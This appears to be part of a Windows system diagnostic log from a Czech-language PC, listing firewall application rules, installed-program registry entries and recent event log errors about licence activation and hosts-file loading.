"{15478B22-4721-4C2B-9445-07A84ED60B8C}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{17F35F6E-30FB-458A-8987-789B34B483A5}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{1E03210C-F5C7-4F71-BE39-3DD2F6696C4A}" = protocol=1 | dir=in | name=archestra icmp |
"{202A875D-94ED-438D-A04C-B7E42736B888}" = protocol=17 | dir=in | app=d:\steam\steam.exe |
"{22484E0F-09BF-4D3E-952F-B9AE5A60631D}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{2304AE01-46AC-4E0A-9EA0-97A394DDF987}" = protocol=6 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer_service.exe |
"{27AF93CF-4787-4257-B5B5-E1F136F1BF5C}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{28C835B8-27BB-467F-AC08-3404D7ED5E6D}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{2A42FF27-FFEA-4562-907F-C5F681F07311}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{34296008-F22A-4D1A-B9BE-994BB32F7AA0}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\rocksmith\rocksmith.exe |
"{3547C78F-BDDB-4BE1-8CC7-B3F8493A54EC}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{3A08F470-61DE-478E-9452-9F75844625E2}" = protocol=6 | dir=in | app=c:\program files (x86)\checkpoint\zonealarm\vsmon.exe |
"{3A20B50C-8E19-422D-A0A9-B72D17FE6011}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\counter-strike global offensive\csgo.exe |
"{40A12CFE-354F-4D7A-969F-6EA7BE3F1382}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\half-life\hl.exe |
"{48FC8092-0AFF-45B6-94A3-CDF588375A7C}" = protocol=17 | dir=in | app=d:\steam\bin\steamwebhelper.exe |
"{4BB28D30-B069-4BFB-9A4C-54D0B268C1EB}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{4C8C5559-8EFD-4F20-ACC2-AFC0C041069D}" = protocol=17 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{52817C2E-1D95-4C53-ADB7-7B876EF9F058}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{52C34AAF-3A1F-4FA2-BBD5-D2CDCC2A5351}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{53880A7A-CA20-4C1A-B2DC-7A6FEAAF82D9}" = protocol=17 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{5489B103-C355-4393-8B7D-D3E393E3E500}" = protocol=6 | dir=in | app=d:\steam\bin\steamwebhelper.exe |
"{54F646BD-BAFF-410B-8DDE-3843D90FC259}" = protocol=6 | dir=in | app=c:\program files (x86)\checkpoint\zonealarm\vsmon.exe |
"{66CEEB91-A77D-4CE3-9D55-A93D1879FF3E}" = protocol=6 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{69966129-DFD0-4C12-BDF2-A797B1B46B73}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{699772A2-FDDD-4379-974D-BE4376461D78}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\age2hd\launcher.exe |
"{6D1FFE68-D05B-4DFC-A635-325BEC489D8C}" = protocol=6 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer.exe |
"{705F1A4D-37E6-47B6-80FD-1A9276AFA2CF}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{778689DE-904F-4299-A999-63032999E413}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\half-life\hl.exe |
"{79EEFABF-5A71-46BF-8515-3E2CF3667F3E}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{7FE58982-8577-4DB1-94EA-6CCB8ADB478B}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{82A0EF9E-BF1C-4FA0-A012-08F2DFE4965C}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{83EA0160-6001-478C-81E7-AADD381FBF4F}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\counter-strike global offensive\csgo.exe |
"{8CD13A0D-CEFB-4D1C-8635-C1FCA7BBC0EF}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{8F6E208E-F30C-4824-AF72-2FBE55E29D2D}" = protocol=17 | dir=in | app=c:\users\lobo\appdata\local\temp\utlite0\utorrent.exe |
"{94E1E73C-441E-43CB-B450-376F19EC846A}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp_launcher.exe |
"{953074C7-1363-41FE-BF2F-8D4F6D8073ED}" = protocol=6 | dir=in | app=c:\program files\hp\hp deskjet 2050 j510 series\bin\usbsetup.exe |
"{9608C3E3-D9AB-46FD-9B59-92DDCC38A97B}" = protocol=17 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer.exe |
"{9905F10A-C881-4F79-8EBE-E6C565501548}" = protocol=17 | dir=in | app=c:\program files (x86)\checkpoint\zonealarm\vsmon.exe |
"{9ED87611-51E2-4A29-AE0B-910048A4469A}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{9F29A904-78AB-410F-9FC6-2E699EEFBE4A}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{A295C5DC-2249-42A6-9ACD-5DC92333F8BB}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{A77D31B8-8211-4C11-84BF-43CA60B94441}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp_dx11.exe |
"{AA75BAA4-D819-42FC-A982-B08BCBB0A0DD}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp.exe |
"{AD0B779A-A37E-4AC2-AD01-0020498695E6}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{BC4ECE41-8E23-47C8-B9BD-278B3282C941}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{C0A30F5F-5FA3-4C42-B72B-C3B31ECA761B}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp.exe |
"{C26F4848-B608-4760-B8E7-82084DB7FF71}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{C310C8DF-62C4-4B3C-9301-73B3BDAD0EA6}" = dir=in | app=c:\program files (x86)\common files\apple\apple application support\webkit2webprocess.exe |
"{CA4DD3B9-71DD-481D-A6F9-BD3F58F52A9B}" = protocol=6 | dir=in | app=c:\users\lobo\appdata\local\temp\utlite0\utorrent.exe |
"{CAC0525A-5611-44F0-952E-F39772BBE64F}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{CCD3F583-9176-4256-A6BA-8557D490D5D8}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{CED16A4C-8E97-4003-8253-E3E28ABBEF62}" = protocol=17 | dir=in | app=c:\program files\hp\hp deskjet 2050 j510 series\bin\usbsetup.exe |
"{CF42C394-3809-47DE-A833-9F238B944DBE}" = dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{CF6D65B1-1C0D-4D92-BED6-C83B7A2C4D96}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{CF8E5146-D07E-4B50-BE51-C9E346CF6262}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{DC0B081B-B6DB-4939-8196-633C1BACAB27}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp_dx11.exe |
"{EA6E6682-5EF7-4928-B2EA-4078FD5B43CF}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\age2hd\launcher.exe |
"{EA9E4C5F-F14F-417D-B035-6F04EF6E4778}" = protocol=6 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{EC487CD1-2266-44B2-823E-463E4DB4B0E1}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{ED15B389-B2D3-47FA-8D83-D6C1E33E29EF}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{EE98473E-0BB7-4BED-8EC0-B037A349C97C}" = protocol=17 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer_service.exe |
"{F6204AC4-B9DC-4E60-8666-138FFDA77E92}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{F6C26DFB-07D7-48C0-8B68-F27151F22869}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\rocksmith\rocksmith.exe |
"TCP Query User{64229DA1-8372-4AEA-98AD-EDC0A8FAE96B}C:\qip 2012\qip.exe" = protocol=6 | dir=in | app=c:\qip 2012\qip.exe |
"TCP Query User{6684E269-B860-4997-869C-9F965777549B}C:\program files (x86)\qip 2012\qip.exe" = protocol=6 | dir=in | app=c:\program files (x86)\qip 2012\qip.exe |
"TCP Query User{D62ECD30-96DC-4C56-9B0D-E4595FCA3111}C:\qip 2010\qip.exe" = protocol=6 | dir=in | app=c:\qip 2010\qip.exe |
"UDP Query User{19507617-7C98-4AE2-B55F-5E90295008E9}C:\qip 2012\qip.exe" = protocol=17 | dir=in | app=c:\qip 2012\qip.exe |
"UDP Query User{6DA69AE1-D934-4D53-8692-D9235B1639FC}C:\program files (x86)\qip 2012\qip.exe" = protocol=17 | dir=in | app=c:\program files (x86)\qip 2012\qip.exe |
"UDP Query User{99F93718-9F76-4CDE-864E-CC5A0B3E6DF5}C:\qip 2010\qip.exe" = protocol=17 | dir=in | app=c:\qip 2010\qip.exe |

========== HKEY_LOCAL_MACHINE Uninstall List ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0E8670B8-3965-4930-ADA6-570348B67153}" = Microsoft SQL Server 2012 Transact-SQL ScriptDom
"{13417784-A359-3CDD-8DE1-B7108707D647}" = Visual Studio 2012 Prerequisites - ENU Language Pack
"{1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1}" = Microsoft .NET Framework 4.5
"{29C93182-34F6-3275-A18D-59326851CD57}" = Microsoft Windows SDK for Visual Studio 2008 .NET Framework Tools
"{2B997E80-3BEC-3222-9114-98DBE1182B2E}" = Microsoft Visual C++ 2012 x64 Debug Runtime - 11.0.50727
"{2BFA9B05-7418-4EDE-A6FC-620427BAAAA3}" = Crystal Reports Basic Runtime for Visual Studio 2008 (x64)
"{49D665A2-4C2A-476E-9AB8-FCC425F526FC}" = Microsoft SQL Server 2012 Native Client
"{50822200-2E95-4E62-A8D8-41C3B308DF5E}" = Microsoft SQL Server VSS Writer
"{5DE154DF-A55E-4FA5-BE59-32E78FCACF3E}" = Microsoft Windows SDK for Visual Studio 2008 Headers and Libraries
"{5FDC06BF-3D3D-4367-8FFB-4FAFCB61972D}" = Cisco Systems VPN Client 5.0.07.0440
"{61862D7C-CDBC-48D5-8AE1-3B8BD1E23BC5}" = Visual Studio 2012 Prerequisites
"{62EED300-E841-4083-A1D6-60B906271804}" = Microsoft Windows SDK for Visual Studio 2008 Tools
"{6390461E-D4C5-44ED-A783-9823ED17BF79}" = Základní software zařízení HP Deskjet 2050 J510 series
"{64D5BBC6-5270-3711-AA39-31C1087AF4E6}" = Microsoft Visual Studio 2008 Remote Debugger - ENU
"{68A48EF1-DF03-394F-AF40-1E4FE42BB8DD}" = Microsoft Visual Studio Team Foundation Server 2012 Object Model Language Pack - ENU
"{6E740973-8E71-42F9-A910-C18452E60450}" = Microsoft SQL Server Native Client
"{6F07A6C2-9068-3673-A120-DC10012468C6}" = Microsoft Visual Studio Team Foundation Server 2012 Object Model
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{85BC0DCB-69E5-4279-AA25-F108EF896588}_is1" = IK Multimedia Authorization Manager version 1.0.10
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1029" = Microsoft .NET Framework 4.5 CSY Language Pack
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5
"{983073CD-FAAF-4907-AA07-037DBA73B8EE}" = ESET Smart Security
"{9aa5f39c-a8de-46b0-919a-0248f8bc8490}" = Microsoft Windows SDK for Visual Studio 2008 SDK Reference Assemblies and IntelliSense
"{9D573E71-1077-4C7E-B4DB-4E22A5D2B48B}" = Microsoft SQL Server 2012 Command Line Utilities
"{A2CB1ACB-94A2-32BA-A15E-7D80319F7589}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727
"{A4F0DB87-3269-34FE-AFFE-4168FDFA4A22}" = Microsoft .NET Framework 4.5 CSY Language Pack
"{A992BBAA-723D-4574-A07F-983BF8FAA3E1}" = Microsoft Windows SDK for Visual Studio 2008 Win32 Tools
"{AC53FC8B-EE18-3F9C-9B59-60937D0B182C}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision" = NVIDIA Ovladač 3D Vision 314.22
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = Ovládací panel NVIDIA 314.22
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Ovladače grafiky 314.22
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB" = NVIDIA Ovladač řídící jednotky 3D Vision 314.22
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX" = NVIDIA Systémový software PhysX 9.12.1031
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update" = Aktualizace NVIDIA 1.12.12
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver" = NVIDIA Ovladač HD audia 1.3.23.1
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NVIDIA.Update" = NVIDIA Update Components
"{BEB0F91E-F2EA-48A1-B938-7857ABF2A93D}" = Microsoft SQL Server 2012 Transact-SQL Compiler Service
"{D0360940-CCC6-11E3-B9C6-F04DA23A5C58}" = Vegas Pro 13.0 (64-bit)
"{D10D0851-CCC6-11E3-9ED2-F04DA23A5C58}" = MSVCRT Redists
"{D3E39E77-0EB4-36FB-B97A-8C8AB21B9A45}" = Visual Studio .NET Prerequisites - English
"{D4BD27CF-BFBC-11E3-9B8F-F04DA23A5C58}" = MSVCRT Redists
"{DA5202AC-12BF-4330-B8EA-BC77F991FA1C}_is1" = AmpliTube 3 version 3.14.0
"{EF8B1A2E-9CCB-3AB2-91E3-4EEDAB1294E1}" = Microsoft Device Emulator (64 bit) version 3.0 - ENU
"{FE4222BB-74BE-48EC-8314-9CAC9A24F02F}" = DigiTech RP155 Drivers
"CrystalDiskMark_is1" = CrystalDiskMark 3.0.2c
"doPDF 7 printer_is1" = doPDF 7.3 printer
"Matlab R2011b" = MATLAB R2011b
"Microsoft Visual Studio 2008 Remote Debugger - ENU" = Microsoft Visual Studio 2008 Remote Debugger - ENU
"Sublime Text 3_is1" = Sublime Text Build 3059
"TeamSpeak 3 Client" = TeamSpeak 3 Client
"WinRAR archiver" = WinRAR 4.20 (64-bit)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}" = PDFCreator
"{07300F01-89CA-4CF8-92BD-2A605EB83C95}" = EasySaver B9.1214.1
"{1C163D33-33B3-33EB-A617-0D4D852BE8E1}" = Microsoft Visual C++ 2012 x86 Debug Runtime - 11.0.50727
"{1F8E06E2-BA93-40DC-B183-E024CBD853A8}" = Microsoft Visual C++ 2012 Compilers
"{20fc1ec7-3058-48d4-80f8-e1cfd52391c7}" = Microsoft Visual Studio Professional 2012
"{241F2BF7-69EB-42A4-9156-96B2426C7504}" = Microsoft SQL Server Compact 3.5 for Devices ENU
"{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}" = Skype™ 6.20
"{26918E50-6EDC-4A59-A31E-E9C1EF06F1BC}_is1" = Batch XLS TO XLSX Converter 2009
"{26A24AE4-039D-4CA4-87B4-2F83217021FF}" = Java 7 Update 45
"{2750B389-A2D2-4953-99CA-27C1F2A8E6FD}" = Microsoft SQL Server 2005 Tools Express Edition
"{291B3A3B-F808-45B8-8113-DF232FCB6C82}" = Microsoft .NET Compact Framework 3.5
"{29F259D7-C517-3EED-84B4-237573CFD39C}" = Microsoft Visual C++ 2012 Microsoft Foundation Class Libraries
"{2AFFFDD7-ED85-4A90-8C52-5DA9EBDC9B8F}" = Microsoft SQL Server 2005 Express Edition (SQLEXPRESS)
"{2E5C075E-11AB-4BDD-918C-7B9A68953FF8}" = Microsoft SQL Server Compact 3.5 Design Tools ENU
"{2F73A7B2-E50E-39A6-9ABC-EF89E4C62E36}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.50727
"{330E5D98-20D2-4CA4-AE51-FCB8AA80F634}" = Microsoft Visual Studio 2012 Devenv
"{388E4B09-3E71-4649-8921-F44A3A2954A7}" = Microsoft Visual Studio 2005 Tools for Office Runtime
"{38FC6E9A-F719-431A-A83D-4C86D5FD6555}" = Microsoft Visual Studio 2012 Shell (Minimum) Resources
"{457D7505-D665-4F95-91C3-ECB8C56E9ACA}" = Easy Tune 6 B10.0516.1
"{47107F5F-FDEC-4A01-896C-E76245743F1A}" = X-Edit
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}" = Microsoft SQL Server Setup Support Files (English)
"{5CBFF3F3-2D40-34EE-BCA5-A95BC19E400D}" = Microsoft .NET Framework 4.5 Multi-Targeting Pack
"{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}" = Apple Application Support
"{5E5D3141-7714-4B2E-8BF2-650C8EF65E3E}" = MySQL Connector Net 6.9.5
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{616C96AC-9B4B-4446-8583-A10C2FDA24A4}" = ZoneAlarm Firewall
"{631471BE-DEAB-454B-A9AC-CE3EB42C28B3}" = Microsoft ASP.NET Web Pages
"{6753B40C-0FBD-3BED-8A9D-0ACAC2DCD85D}" = Microsoft Document Explorer 2008
"{6889EE56-1816-4E89-94DF-9F56E7804039}_is1" = Counter-Strike 1.6 Non-Steam patch v36
"{6C9F6D23-E9AD-43C9-B43A-011562AAF876}" = Windows Mobile 5.0 SDK R2 for Pocket PC
"{6D6D43E5-218C-4B05-92D3-2240810F4760}" = Microsoft SQL Server 2012 T-SQL Language Service
"{731C183B-86A0-3442-BE55-68A7C92581E9}" = Microsoft Visual C++ 2012 Extended Libraries
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79BF4901-1EC4-4726-B3C2-A7859706C6E7}" = League of Legends
"{7A3DF2E2-CF13-44FB-A93E-F71D5381DB3F}" = HP Deskjet 2050 J510 series Nápověda
"{800F484E-9D69-492D-B656-7BAA32586142}" = Microsoft Visual Studio 2012 Shell (Minimum)
"{820C677A-41B2-48C3-8136-FEE35A052E73}" = Microsoft Visual Studio 2012 Shell (Minimum) Interop Assemblies
"{830A6D6D-D9FA-4171-9288-1FCFB6C7367E}" = Wonderware InTouch
"{86D8A96B-1911-4C3F-AA16-0B47E053E492}" = PDF Architect
"{8833FFB6-5B0C-4764-81AA-06DFEED9A476}" = Realtek Ethernet Controller Driver For Windows 7
"{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}" = NVIDIA PhysX
"{8E44476E-11BF-41A5-A457-266FD27F344D}" = ZoneAlarm Security
"{8FB53850-246A-3507-8ADE-0060093FFEA6}" = Visual Studio Tools for the Office system 3.0 Runtime
"{90110405-6000-11D3-8CFE-0150048383C9}" = Microsoft Office Professional Edition 2003
"{90120000-0020-0405-0000-0000000FF1CE}" = Sada Compatibility Pack pro systém Office 2007
"{90120000-0021-0000-0000-0000000FF1CE}" = Microsoft Office Visual Web Developer 2007
"{90120000-0021-0409-0000-0000000FF1CE}" = Microsoft Office Visual Web Developer MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
"{93489CA8-6656-33A0-A5AC-E0EDEDB17C3E}" = Microsoft Visual Studio Professional 2012
"{9656F3AC-6BA9-43F0-ABED-F214B5DAB27B}" = Windows Mobile 5.0 SDK R2 for Smartphone
"{980A182F-E0A2-4A40-94C1-AE0C1235902E}" = Pando Media Booster
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9A33B83D-FFC4-44CF-BEEF-632DECEF2FCD}" = Microsoft SQL Server Database Publishing Wizard 1.2
"{A4366F69-CE22-4DB7-9C8C-46A5845AF997}" = Microsoft Visual C++ 2012 Compilers - ENU Resources
"{A62392EE-03CB-4FA8-8E79-B5F95A346FB3}" = Kontrola české gramatiky pro sadu Microsoft Office 2003
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AA467959-A1D6-4F45-90CD-11DC57733F32}" = Crystal Reports Basic for Visual Studio 2008
"{AC76BA86-7AD7-1029-7B44-AB0000000001}" = Adobe Reader XI (11.0.09) - Czech
"{AD1AEE2A-D9C0-3FAC-8D6B-B5E07B47257B}" = Microsoft Visual C++ 2012 Core Libraries
"{B0069CFA-5BB9-4C03-B1C6-89CE290E5AFE}" = HP Update
"{B1465D1D-6427-4CA1-AE29-8B699209E663}" = Microsoft Visual Studio 2012 Devenv Resources
"{B2DC3F08-2EB2-49A5-AA24-15DFC8B1CB83}" = @BIOS
"{BAD0254F-9BDB-3D14-A5AC-9C0EF51F3D09}" = Microsoft Portable Library Multi-Targeting Pack Language Pack - enu
"{BCC899FE-2DAA-460C-A5FB-60291E73D9C3}" = Microsoft SQL Server Compact 3.5 ENU
"{C4CAD994-6EA2-3121-8352-DA593150B322}" = Microsoft Portable Library Multi-Targeting Pack
"{C6640705-7479-4EE5-BC86-879F05F65E74}" = Google Drive
"{C75FAD21-EC08-42F3-92D6-C9C0AB355345}" = AutoGreen B10.0517.1
"{C8C8387B-A98B-44E8-807A-1A9B7F51FFDA}" = Blaze Media Pro
"{D7DAD1E4-45F4-3B2B-899A-EA728167EC4F}" = Microsoft Visual Studio 2008 Professional Edition - ENU
"{DCDEC776-BADD-48B9-8F9A-DFF513C3D7FA}" = Microsoft ASP.NET MVC 3
"{DE602740-B2BE-4227-957E-0E11075C43F4}" = ZoneAlarm Antivirus
"{E040B65B-8683-4228-8C33-D44A141E40EA}" = Secure Download Manager
"{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}" = Cs Non Steam
"{EDDF99D9-9FE3-4871-A7DB-D1522C51EE9A}" = Microsoft .NET Compact Framework 2.0 SP2
"{EDFE2142-CFB3-44AB-A961-DE85F6408A28}" = Sentinel Protection Installer 7.3.2
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{FDB30193-FDA0-3DAA-ACCA-A75EEFE53607}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.50727
"{FF29527A-44CD-3422-945E-981A13584000}" = VC Runtimes MSI
"Adobe Flash Player Plugin" = Adobe Flash Player 15 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 12.0
"aTube Catcher" = aTube Catcher
"Audacity_is1" = Audacity 2.0.5
"AVS4YOU Video Converter 7_is1" = AVS Video Converter 8.5
"Battle.net" = Battle.net
"Blaze Media Pro" = Blaze Media Pro
"Comodo Dragon" = Comodo Dragon
"DAEMON Tools Lite" = DAEMON Tools Lite
"DigiTech RP155 Drivers" = DigiTech RP155 Drivers
"Fraps" = Fraps (remove only)
"Free Video Flip and Rotate_is1" = Free Video Flip and Rotate version 2.1.9.822
"GetRight_is1" = GetRight
"Google Chrome" = Google Chrome
"Hearthstone" = Hearthstone
"HP Photo Creations" = HP Photo Creations
"HyperCam 2" = HyperCam 2
"InstallShield_{457D7505-D665-4F95-91C3-ECB8C56E9ACA}" = Easy Tune 6 B10.0516.1
"InstallShield_{C75FAD21-EC08-42F3-92D6-C9C0AB355345}" = AutoGreen B10.0517.1
"IsoBuster_is1" = IsoBuster 3.3
"KLiteCodecPack_is1" = K-Lite Codec Pack 9.8.0 (Full)
"League of Legends 3.0.1" = League of Legends
"Malwarebytes Anti-Malware_is1" = Malwarebytes Anti-Malware verze 2.0.4.1028
"Microsoft Document Explorer 2008" = Microsoft Document Explorer 2008
"Microsoft SQL Server 2005" = Microsoft SQL Server 2005
"Microsoft Visual Studio 2005 Tools for Office Runtime" = Microsoft Visual Studio 2005 Tools for Office Runtime
"Microsoft Visual Studio 2008 Professional Edition - ENU" = Microsoft Visual Studio 2008 Professional Edition - ENU
"Mozilla Firefox 33.1 (x86 cs)" = Mozilla Firefox 33.1 (x86 cs)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"NVIDIAStereo" = NVIDIA Stereoscopic 3D Driver
"PSPad editor_is1" = PSPad editor
"QuicktimeAlt_is1" = QuickTime Alternative 3.2.0
"Razer Game Booster_is1" = Razer Game Booster
"REAPER" = REAPER
"Smart File Advisor_is1" = Smart File Advisor 1.2.0
"SopCast" = SopCast 3.8.3
"StarCraft II" = StarCraft II
"Steam App 10" = Counter-Strike
"Steam App 205190" = Rocksmith
"Steam App 221380" = Age of Empires II: HD Edition
"TeamViewer 9" = TeamViewer 9
"The KMPlayer" = KMPlayer (remove only)
"Visual Studio Tools for the Office system 3.0 Runtime" = Visual Studio Tools for the Office system 3.0 Runtime
"VisualWebDeveloper" = Microsoft Visual Studio Web Authoring Component
"WinGimp-2.0_is1" = GIMP 2.6.11
"xampp" = XAMPP
"X-Edit" = X-Edit
"ZoneAlarm Free Firewall" = ZoneAlarm Free Firewall

========== HKEY_USERS Uninstall List ==========

[HKEY_USERS\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"QIP 2012" = QIP 2012 4.0.8866
"UnityWebPlayer" = Unity Web Player
"zonealarm" = ZoneAlarm Security Toolbar

========== Last 20 Event Log Errors ==========

[ Application Events ]
Error - 18.10.2014 3:48:14 | Computer Name = Lobo-PC | Source = Software Protection Platform Service | ID = 8198
Description = Aktivace licence (slui.exe) se nezdařila s následujícím kódem chyby:
0x800401F9

Error - 18.10.2014 3:48:14 | Computer Name = Lobo-PC | Source = Winlogon | ID = 4103
Description = Aktivace licence systému Windows se nezdařila. Chyba 0x00000000.

Error - 19.10.2014 3:46:27 | Computer Name = Lobo-PC | Source = Software Protection Platform Service | ID = 8198
Description = Aktivace licence (slui.exe) se nezdařila s následujícím kódem chyby:
0x800401F9

Error - 19.10.2014 3:46:27 | Computer Name = Lobo-PC | Source = Winlogon | ID = 4103
Description = Aktivace licence systému Windows se nezdařila. Chyba 0x00000000.

Error - 20.10.2014 1:04:09 | Computer Name = Lobo-PC | Source = Software Protection Platform Service | ID = 8198
Description = Aktivace licence (slui.exe) se nezdařila s následujícím kódem chyby:
0x800401F9

Error - 20.10.2014 1:04:09 | Computer Name = Lobo-PC | Source = Winlogon | ID = 4103
Description = Aktivace licence systému Windows se nezdařila. Chyba 0x00000000.

Error - 21.10.2014 5:55:58 | Computer Name = Lobo-PC | Source = Software Protection Platform Service | ID = 8198
Description = Aktivace licence (slui.exe) se nezdařila s následujícím kódem chyby:
0x800401F9

Error - 21.10.2014 5:55:58 | Computer Name = Lobo-PC | Source = Winlogon | ID = 4103
Description = Aktivace licence systému Windows se nezdařila. Chyba 0x00000000.

Error - 22.10.2014 2:37:56 | Computer Name = Lobo-PC | Source = Software Protection Platform Service | ID = 8198
Description = Aktivace licence (slui.exe) se nezdařila s následujícím kódem chyby:
0x800401F9

Error - 22.10.2014 2:37:56 | Computer Name = Lobo-PC | Source = Winlogon | ID = 4103
Description = Aktivace licence systému Windows se nezdařila. Chyba 0x00000000.

[ System Events ]
Error - 9.12.2014 3:37:46 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 3:37:50 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 3:39:41 | Computer Name = Lobo-PC | Source = Service Control Manager | ID = 7000
Description = Služba Služba Google Update (gupdate) neuspěla při spuštění v důsledku
následující chyby: %%2

Error - 9.12.2014 8:41:33 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 8:41:37 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
